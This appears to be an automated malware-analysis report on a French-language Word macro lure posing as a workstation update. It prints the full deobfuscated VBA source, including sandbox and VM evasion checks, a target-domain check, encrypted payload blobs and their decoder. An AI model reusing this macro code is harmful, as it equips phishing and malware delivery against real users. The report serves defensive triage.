MALICIOUS
290
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains VBA macros that trigger a Shell() call, indicative of executing commands. The document body presents a lure for a fake Windows workstation update, instructing the user to save the file and click a button. The VBA script, though truncated, references cmd.exe, suggesting an attempt to run system commands to achieve its malicious objective.
Heuristics 9
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
End If 'Call Shell("cmd.exe /K ECHO Mise a jour de la station de travail %COMPUTERNAME% pour %USERNAME%, veuillez patienter... & ping -n 6 127.0.0.1 > nul & ECHO Mise a jour a jour complete !", vbNormalFocus) Dim JSYKsfbkulFLwzF As String -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
If CreateObject("Scripting.FileSystemObject").FileExists(ThisDocument.Path & Application.PathSeparator & ThisDocument.Name & ":Zone.Identifier") Then -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
tns = Array("vmware", "vmtools", "vbox", "process explorer", "processhacker", "procmon", "visual basic", "fiddler", "wireshark") Set ws = GetObject("winmgmts:\\.\root\cimv2") -
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBAMatched line in script
End If 'Call Shell("cmd.exe /K ECHO Mise a jour de la station de travail %COMPUTERNAME% pour %USERNAME%, veuillez patienter... & ping -n 6 127.0.0.1 > nul & ECHO Mise a jour a jour complete !", vbNormalFocus) Dim JSYKsfbkulFLwzF As String -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Dim userDomain As String userDomain = Environ$("userdomain") 'si on est bien dans le domaine du client -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/officeDocument/2006/bibliography In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16576 bytes |
SHA-256: 470e940fa9d04f12cc38c604a2c103d4562f0f458f7a970ccc2d32cf0348b3f8 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
171 of 328 identifiers look randomly generated (e.g. 'dAV5aLRSox1FNDD5neJYMFZblXYwAgPKZJnC3Ikd') — consistent with name-mangling obfuscation. Carved artifact contains 10 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Mise_a_jour_de_la_station_de_travail1, 0, 0, MSForms, CommandButton"
Private Sub Mise_a_jour_de_la_station_de_travail1_Click()
Call mise_a_jour_windows
End Sub
Attribute VB_Name = "Module1"
Sub mise_a_jour_windows()
On Error Resume Next
'If checkRecentDocs Then
'Exit Sub
'End If
If checkNbrOfTask Then
MsgBox ("2")
Exit Sub
End If
If checkTasks Then
MsgBox ("3")
Exit Sub
End If
'checkZoneIdentifier
'checkPartOfDomain
If checkBios Then
MsgBox ("4")
Exit Sub
End If
If checkPnP Then
MsgBox ("5")
Exit Sub
End If
If checkUsername Then
MsgBox ("6")
Exit Sub
End If
'If checkFilenameHash Then
'MsgBox ("7")
'Exit Sub
' End If
If checkFilenameBad Then
MsgBox ("checkFilenameBad")
Exit Sub
End If
'checkPreciseFileName
'checkCores
'If checkAppCount Then
'Exit Sub
'End If
'If checkApps Then
'Exit Sub
'End If
If verifyPreciseDomain Then
MsgBox ("verifyPreciseDomain")
Exit Sub
End If
'Call Shell("cmd.exe /K ECHO Mise a jour de la station de travail %COMPUTERNAME% pour %USERNAME%, veuillez patienter... & ping -n 6 127.0.0.1 > nul & ECHO Mise a jour a jour complete !", vbNormalFocus)
Dim JSYKsfbkulFLwzF As String
Dim EKKdVAjzttW As String
Dim cTdzQWOUWEEVexjiF As String
Dim TkvnhzpvknoLxyTmn As String
Dim fXhXNVEleO As String
Dim NJqYJJYErv As String
Dim hDXThtgUsEh As String
Dim rkqdOMkxmnSp As String
Dim WauMdbKKmxueesFlTRlH As String
Dim wxpLHjNnjVZ As String
Dim pUCAotjVuCQBfkftGrwC As String
Dim FhnDRjyhZREVMT As String
cTdzQWOUWEEVexjiF = "OMm1WEG35CB10cfBkZepJ38LUfkeK4HwnJPU7plwIw2+1r6eiWTFSogVe1LHUPBjbze1CKWErjH8U=PEnxK1NheiLSSSdgZMaITxoR1FNgD5xmJYzTZddXYE3gIlHJWC3ab9K6O7=LbMbdzib9s4PLc6CzVVMm7gjsab28rA7J24NG4EDIduZ1QjnYOBI/8e=8MNWiQffy1rXZiLqoSOQDVhLHhyBlvReWclPSlxk2GE8sHl0GPZr/zEhhngLccSdsVCaUISoTVwO=DNe9J0zFoQhXVdNzGLZls33m29xL27LBbMR1zwdTfZNL86/88sMg39jcab2jBAzv24qa4YqugK21urnqJVICTe=OENFbQfbj1h6QiLXNSzeDVD8k7iB3YzeJvYSG1xI6GM1eHN4D7/f/FlcMzMLVandEEQf4ISUiVsmND3UmUHNFptdwKGNZ/1ZP93UKU9Jp29nGb01+zvcTQxNLfg/3VsM8UgjVFpt3"
TkvnhzpvknoLxyTmn = "BANs2OSq7k0u1=0f3mn+HgIj2jjPCNM+QfRN12fQs/8NjTXRyvL47BB9vJeRloHl1xNlGi7DJ/h9fgsn6MLFanlyEQ1KISGWVsvMVnem8QYH6PFAvtNE/1xO93dAU6xb25szSV7+wjf1CSNQr9/fvsdb79i7FH2VBbNje26qMavs1=0KHmnNdgOa2jf0CpmzQ1rN1pCQ0ub7k2X7VXL=gEHslzKBlcPp1UWDGGce5ftR/xhv6dspqv/8anj1EGfhIoCWOVjMbFLUfuYJgPFtvtBqg18M93iHU1kseqNzNIfIuYfZ5qNtp9vElv2q7kMvFM0Dlk7jcIUi4xv+pk0cUcnPRgAl2IjyCOxKRacNW94XHP8BGnXuup/zJEtvlj4gle/1P+/DTEfeA8gfPbhLK99QfMxAadl1EkvinniWpMm+=5LcJuYNMPJvl3Y/gGZO9diSd1vsO5=8FMfo9YfwCSBkr9i2l4gn7/3AFQtDhJqlT2UX"
fXhXNVEleO = "Lbvve=yPhmDUR8Ih2IwnCmmKS9v7eW4ADg8TwngYeX7UJgHslgJdYMH1wBCRiEftt4gBrx=oK9N6fMUamHA04git0oBNwmdAZLPgu+NZqdblO3og/1VNG3S3dKY2y=q+vfXW9r7sSYhr6p5l3=IKewA6M9R5d73e4Um4bDHd=MXhx8RRK97erRngzMObzfB6W4D8fiyS4fpenw1Jg+jYNDdzoP1Y1Cd1Bfq24YrPbnHK6MefheSa17AFwa3gro+xwm7=5/eJu09Z3RXldOggChVsEwc5dK0O7=gbMr/zYdTs0B6rkkzlhgIs8rgAp27mA75247t4bbHd=6phHXYJVK7h8f=pwWxYOfSlr6KiWbpSogle1pHJRSjtjeK/oPvlxCLiBrsH8tePym/Klgh62wSEwGAmQaInSoqAwN5D58aJY7TZwBXYcDgIgZJ5C3yvgKwO7yIbMlxz=b9sTDLcpzzdVMmbdjqnp2FcL7624EO4b7kdUp1"
NJqYJJYErv = "QTzYOKI/ee=8p2WvUfrw1rx8iWLNSo0D/p7HcyBlhOelqYPnlxkEGEv8H+lDPYa/zghhnILcDHdskQaJISoGVwjXD5U=JjdFoQhXViYz/1Zlq33h3gxe27f9bIDwz6cTbrSLfd/8qjMgG9j9XpGUBA5A24oL4BkugU819jnqOgIy5j=xENFQQfdp1h68iLINSsXDQQ8k8iB3vJeYloPL1xLGGMdeHhrDBan/cFshTtLVwSd=m5fEISuOV=gNDKemUzYF3nFwvGNiCLZWVtU3U92m27ESbgY+GHbTK+YVq1/qqsM/tg3LFp+DBECs2O5q7I0uMc0fyHnMJgIjcejKCNpwQuro12CQhI=NJzeDq+LJ8EBglztglo501BCVGybeUasDFbh/9gsnSML4zHl=EQMVI0JDVIWMFB7mhQYFIqFVl3NdxKZA93bBU6Kb2ZrzSVY+kwf1lqNPqd/Evsd779izFHaGByNjDRUqLbvs1c0KXcnfgVOF"
hDXThtgUsEh = "2jfYC/oCQ7bNPmfQTm87m4XfqvLFfBH1lzW3lcPP1sLDtg=ewhgRFxh3T9siqvL+anaEEwcVITCWON3Mbh8UsjYJSPFRl3BDg1H/938HUrKs2qNzRMf+w9frAqNUIgvolvp4768AFM+DlC5jhHzqHxvE6c0ThmnRRgV12jE6CAuKRgcN4r4XTg8W=IXkupXuJESFlzcgle51PICD=FvTpagTYbh0T9MWfMwAanh1EK6iILQWxwmM8ZL/JuYiTPIWl3P8g1=t9bbSU3/s67=zttfNzYf/sSBur9iRlSh/7krAm7tDAb7lT2UIVxvt/k0OhmOTR8Al2MNnxreKYav7g94A0W88+4XEeXOyJMWFlrDdlUb1WGIRyPfB58g1Jx=hK9cufIUAaudA04UiB0oB1wmy=5Ljgu+DZqcOlp+3gT6VWRmSvsuYcn=Pfvf5w9rosSYBrkpSlLdIlEiA6Q9R3k7374UGHx5Hd=JlhLwRRTi7eeBng/WO"
rkqdOMkxmnSp = "MVfBWr408fi9S4eVeuL1JrTjYJ6ddlPfeACT5Pf7B4YdPbaCKkMhf0xS4HEA/wa3=roFUFmjD5XdJuwFZdValODg2yZVacwck9KM77=r5MNwzYcEsTPKr/7zlmUIGgjgmo2T3A7H247t4bGndK2PhQzYJgK7O7==5NWBZOf+YW60iWTmSTQGeDiHJR7jtjeKKbPbWxCL2BPiH8rpPbG/KkOhei7Sk/dAV5aLRSox1FNDD5neJYMFZblXYwAgPKZJnC3IkdKH8yjEbM7Dzib9s4WLc6CzVVMIt9juAs2urACI24wH4EGZdn61QmbYOhA/02=f5NWdUfrA1rdZiCVNSJdD//CHWF+lYzelboPsR1kRGEdSH+YDPan/z/XhUgLcendLEQauqqR0VwQTDN79J50FZkFXbEYzGgZ6hG3TU9xO27LIb8b+zXbTsLPLp8i8hvMKs9j3FpGMBAxv2TSq4YCugk21DrnqODIo2j=/ENWbQfdw1hPR"
WauMdbKKmxueesFlTRlH = "imzNH2lDkvLkNiB3/RefdYSA1xI6GgYeHTsDBbN/fkcM65LaKndjFQfWISiDVsmNDv/mN90F3tdwqGNYb1Zz93UqU9Qk27iSbVd+GifTC4NVG9/YYvMNG93QFpLGBz6022Sq7avu12JfHrn9HgIR8ej4CNu5Qu1o1bQQhCqNmqeRyvLJ7BB9tztMloAR1x4VGg=eUTrDYuh9F1sCSMLdKnlbEQMVI0vDVI+MDnem8jYHoWFpdtNqg1Z093mTUkxD2eNzS27+kxf1frN7Ld/pvsdN79BzFprlBdCje26qzBmswU0ZXcncoVOi2jfYCpoKQzcN4VQQ8g87H2XMCXL/JEBTlzwjlcH11+ODTJ=ewftRF/hs=gsVxM/QanGOEwRVIrTWOTQMqBLmL7YwTPFzvt8pg1hp9pwOUldse78z53vIkxfZgqNUfgvRlv=n763AFEoD3K6j64UqkYv+zk0AUcnvRgvH2xMxCiMKQ3fNlq4QYf8v+4Xr"
wxpLHjNnjVZ = "upXLJEUFljeBl5L1PZLDCvveg4gfYbhH9g9XfMeSanhvEF1inx7WxGmMQ5L2L7YWZqF3l3gWg1=Y9D3SftfAA9fHsSBWr9GolvWI7kVAm7rDlQqjTnUPBbvF/k0lhmSKR80S21jnCZWKUav7wq4zSW8gwnXIeXx1JMUsle6dYoX1W/IRCiftgagkPb=oK9XHfMUAaDEA0E1izoUWuFmO=5Lxf7+IZqNjlpAfgThV9jwS+1KY7n=JtvfuzYrSsSwur6V5l4WIl1HAnx9D5L7i0nUZzbv4d=ThhLzrRAO72o=ngJMOZVfqg94hHf8fS4AGeucHJgOjzKvdzbPf49Cd8PfoH8g=PbnuK9OQfSwSaJFAZ1aigSorzwmuvZX=JuwTZ3NXlD+gglHVNC3c+9KIRy=QbMrzzYdUsSOLr17zYLYIKEjABs2dlA7nO4Q44b04d=c1hjOYJT87D7==x4WRMVfs1r4UiWVmSTeVeuSHNg+j"
pUCAotjVuCQBfkftGrwC = "adedSoPElxC6iBr7H8rGPEA/K/3hfs8SkmdgkCa6MqodVwNGD5hfJudmZdtXY=AgbyZJB33gKX8yjUbMc7zib9soBLrsizzZMmsdjL5b2BBACw24ER4bfZdqY1QHWYOXA7Te=z72WyUffr1rCGiWFESuXD/hiHhYBlSzeu/lPAY1C=GE7LHlgVPBn/zkchUgLcamduFQaFRSReVwQsD53GJj+FokFXaCNgwKZ6N33AegxL27LIb8fwzZ2Tb=WLtkiz8sM7K9jRabGIBAg=2olE4v9ugfp1lI1Y8gIBej=e72FNQfvw1h6/iIiNHHeD+nLkaiBizzeBtoSM1xYaGgf3HTUDB58/+kcMetLq4ndym5faISUVV=jXD3UmNBNF3odwKCN9KLZvVt3KU9/e27nzb01+GHbTK+YLU9/3VsM279uCFpLGBE5j2Omq7LeusmJ1UHnooVIm2j=pCNolQfTN1CPQhgqNJ2XDy+LTsPBnvJdnlobG"
FhnDRjyhZREVMT = "1xWDGU2eUa5D7va/tgsKxML2anRfEQ6uIS/iVROMVa7mF80HkWF8cGNag1Q493bSU9db2ZfzbJf+f1rxNQp9/5tvo=79MiFH+VBd6j2x4qzYvsec0KlcnboVOU2jgiC/WCQzbNPh4QSC87m4XT/XL/JEB6lzKMlc9h1ILDGGce5NgRf/hS8gsiqvL+anj7EGg2In7WV7mMqvLU74YK3qFmt3B1g1hV938OU8lsenBzNif+v9frCSNtr9vllvS/76jiFaoDBW7jO2Ui//v7e=0hHm8bRgVS2jE6CApKQ3fNmq4XiP82+4XG8XLbJEFsljtBlbR1PZLDCifT58gMf/he9gsLfM80ad71EMRinLQWzrg+VuLOF7Y03qJil3RDgGWt9iHSUsusDNfz1vfN9YfcAqNsr9p5lShI7/1AmO2Drz7jcnUUHxvad=ykhmpBRgCl2Ipn5AmKS3fNe94eHf8D+4gMeXc8JCMQ"
EKKdVAjzttW = cTdzQWOUWEEVexjiF + TkvnhzpvknoLxyTmn + fXhXNVEleO + NJqYJJYErv + hDXThtgUsEh + rkqdOMkxmnSp + WauMdbKKmxueesFlTRlH + wxpLHjNnjVZ + pUCAotjVuCQBfkftGrwC + FhnDRjyhZREVMT
JSYKsfbkulFLwzF = "Wsv5LQjsp7Zk1zTJ95XU84d+wa7Ve/4016/BFfco2xictpulbCcDzOsPL1G/F0ki9sviME+tZQsbFihVP"
'Shell (StrConv(YMxlfeXoQkyCchX(HdrROagFHcClGMFzo(EKKdVAjzttW, JSYKsfbkulFLwzF)), vbUnicode))
Call Shell("cmd.exe /K ECHO Mise a jour de la station de travail %COMPUTERNAME% pour %USERNAME%, veuillez patienter... & ping -n 6 127.0.0.1 > nul & ECHO Mise a jour a jour complete !", vbNormalFocus)
End Sub
Public Function checkApps() As Boolean
d = False
tns = Array("vmware", "vmtools", "vbox", "process explorer", "processhacker", "procmon", "visual basic", "fiddler", "wireshark")
Set ws = GetObject("winmgmts:\\.\root\cimv2")
Dim names() As String
ReDim names(WordBasic.AppCount())
WordBasic.AppGetNames names
For Each n In names
For Each tn In tns
If InStr(LCase(n), tn) > 0 Then
d = True
End If
Next
Next
If d Then
checkApps = True
Else
checkApps = False
End If
End Function
Public Function checkAppCount() As Boolean
If WordBasic.AppCount() < 50 Then
checkAppCount = True
Else
checkAppCount = False
End If
End Function
Public Function checkPreciseFileName() As Boolean
badName = False
If ActiveDocument.Name <> "Pafish.docm" Then
badName = True
End If
If badName Then
checkPreciseFileName = True
Else
checkPreciseFileName = False
End If
End Function
Public Function checkFilenameHash() As Boolean
hexchars = "0123456789abcdef"
c = 0
For i = 1 To Len(ThisDocument.Name)
s = Mid(LCase(ThisDocument.Name), i, 1)
If InStr(s, hexchars) > 0 Then
c = c + 1
End If
Next
If c >= (Len(ThisDocument.Name) - 5) Then
checkFilenameHash = True
Else
checkFilenameHash = False
End If
End Function
Public Function checkFilenameBad() As Boolean
badName = False
badNames = Array("malware", "myapp", "sample", ".bin", "mlwr_", "Desktop")
For Each n In badNames
If InStr(LCase(ActiveDocument.FullName), n) > 0 Then
badName = True
End If
Next
If badName Then
checkFilenameBad = True
Else
checkFilenameBad = False
End If
End Function
Public Function checkTasks() As Boolean
badTask = False
badTaskNames = Array("vbox", "vmware", "vxstream", "autoit", "vmtools", "tcpview", "wireshark", "process explorer", "fiddler")
For Each Task In Application.Tasks
For Each badTaskName In badTaskNames
If InStr(LCase(Task.Name), badTaskName) > 0 Then
badTask = True
End If
Next
Next
If badTask Then
checkTasks = True
Else
checkTasks = False
End If
End Function
Public Function checkCores() As Boolean
badCores = 0
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48)
For Each objItem In colItems
If objItem.NumberOfCores < 3 Then
badCores = True
End If
Next
If badCores Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Function
Public Function checkBios() As Boolean
badBios = False
badBiosNames = Array("virtualbox", "vmware", "kvm")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_Bios", , 48)
For Each objItem In colItems
For Each badName In badBiosNames
If InStr(LCase(objItem.SMBIOSBIOSVersion), badName) > 0 Then
badBios = True
End If
If InStr(LCase(objItem.SerialNumber), badName) > 0 Then
badBios = True
End If
Next
Next
If badBios Then
checkBios = True
Else
checkBios = False
End If
End Function
Public Function checkPnP() As Boolean
badPNP = False
badPNPNames = Array("VEN_80EE", "VEN_15AD")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_PnPEntity", , 48)
For Each objItem In colItems
For Each badName In badPNPNames
If InStr(LCase(objItem.DeviceId), badName) > 0 Then
badPNP = True
End If
Next
Next
If badPNP Then
checkPnP = True
Else
checkPnP = False
End If
End Function
Public Function checkUsername() As Boolean
badUsername = False
badUsernames = Array("admin", "malfind", "sandbox", "test")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
For Each objItem In colItems
For Each badName In badUsernames
If InStr(LCase(objItem.UserName), badName) > 0 Then
badUsername = True
End If
Next
Next
If badUsername Then
checkUsername = True
Else
checkUsername = False
End If
End Function
Public Function verifyPreciseDomain() As Boolean
Dim domainToCheck As String
domainToCheck = "saturne"
Dim userDomain As String
userDomain = Environ$("userdomain")
'si on est bien dans le domaine du client
If InStr(LCase(userDomain), LCase(domainToCheck)) Then
verifyPreciseDomain = False
Else
verifyPreciseDomain = True
End If
End Function
Public Function checkPartOfDomain() As Boolean
partOfDomain = False
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
For Each objItem In colItems
If objItem.partOfDomain Then
partOfDomain = True
End If
Next
If partOfDomain Then
checkPartOfDomain = True
Else
checkPartOfDomain = False
End If
End Function
Public Function checkZoneIdentifier() As Boolean
If CreateObject("Scripting.FileSystemObject").FileExists(ThisDocument.Path & Application.PathSeparator & ThisDocument.Name & ":Zone.Identifier") Then
checkZoneIdentifier = True
Else
checkZoneIdentifier = False
End If
End Function
Public Function checkNbrOfTask() As Boolean
If Application.Tasks.Count < 3 Then
checkNbrOfTask = True
Else
checkNbrOfTask = False
End If
End Function
Public Function checkRecentDocs() As Boolean
If Application.RecentFiles.Count < 3 Then
checkRecentDocs = True
Else
checkRecentDocs = False
End If
End Function
Function HdrROagFHcClGMFzo(nKyaisQnDvP As String, ujNHJbTOMZBY As String) As String
Dim vCqgDvGgcYPFSLbAf As String
Dim VTZNPWtRsKVgfWAZHCG As Long
Dim rRDeLadOxzqFpBBe As Long
Dim fCIvqJuUQOrDpoAFFD As Long
HdrROagFHcClGMFzo = ""
vCqgDvGgcYPFSLbAf = "2/q0V8ZF=1BMa7YcLztpnTWhRNsSUg65wexEDOuomAP3X4lrkKGvIy9iQJjbHdfC+"
rRDeLadOxzqFpBBe = 1
For VTZNPWtRsKVgfWAZHCG = 1 To Len(nKyaisQnDvP)
fCIvqJuUQOrDpoAFFD = InStr(vCqgDvGgcYPFSLbAf, Mid(nKyaisQnDvP, VTZNPWtRsKVgfWAZHCG, 1)) - 1
fCIvqJuUQOrDpoAFFD = fCIvqJuUQOrDpoAFFD - (InStr(vCqgDvGgcYPFSLbAf, Mid(ujNHJbTOMZBY, rRDeLadOxzqFpBBe, 1)) - 1)
fCIvqJuUQOrDpoAFFD = (fCIvqJuUQOrDpoAFFD Mod 65)
If (fCIvqJuUQOrDpoAFFD < 0) Then
fCIvqJuUQOrDpoAFFD = fCIvqJuUQOrDpoAFFD + 65
End If
fCIvqJuUQOrDpoAFFD = fCIvqJuUQOrDpoAFFD + 1
HdrROagFHcClGMFzo = HdrROagFHcClGMFzo & Mid(vCqgDvGgcYPFSLbAf, fCIvqJuUQOrDpoAFFD, 1)
rRDeLadOxzqFpBBe = rRDeLadOxzqFpBBe + 1
If rRDeLadOxzqFpBBe > Len(ujNHJbTOMZBY) Then
rRDeLadOxzqFpBBe = 1
End If
Next VTZNPWtRsKVgfWAZHCG
End Function
Function YMxlfeXoQkyCchX(ByVal QdlDIrNTjASyeN As String) As Byte()
Dim JUiNmNdoJmWQkzCgPNyp As Object
Dim ilCuylucYGMVsPGKnYyE As Object
Set JUiNmNdoJmWQkzCgPNyp = CreateObject("MSXML2.DOMDocument")
Set ilCuylucYGMVsPGKnYyE = JUiNmNdoJmWQkzCgPNyp.createElement("b64")
ilCuylucYGMVsPGKnYyE.DataType = "bin.base64"
ilCuylucYGMVsPGKnYyE.Text = QdlDIrNTjASyeN
YMxlfeXoQkyCchX = ilCuylucYGMVsPGKnYyE.nodeTypedValue
Set ilCuylucYGMVsPGKnYyE = Nothing
Set JUiNmNdoJmWQkzCgPNyp = Nothing
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.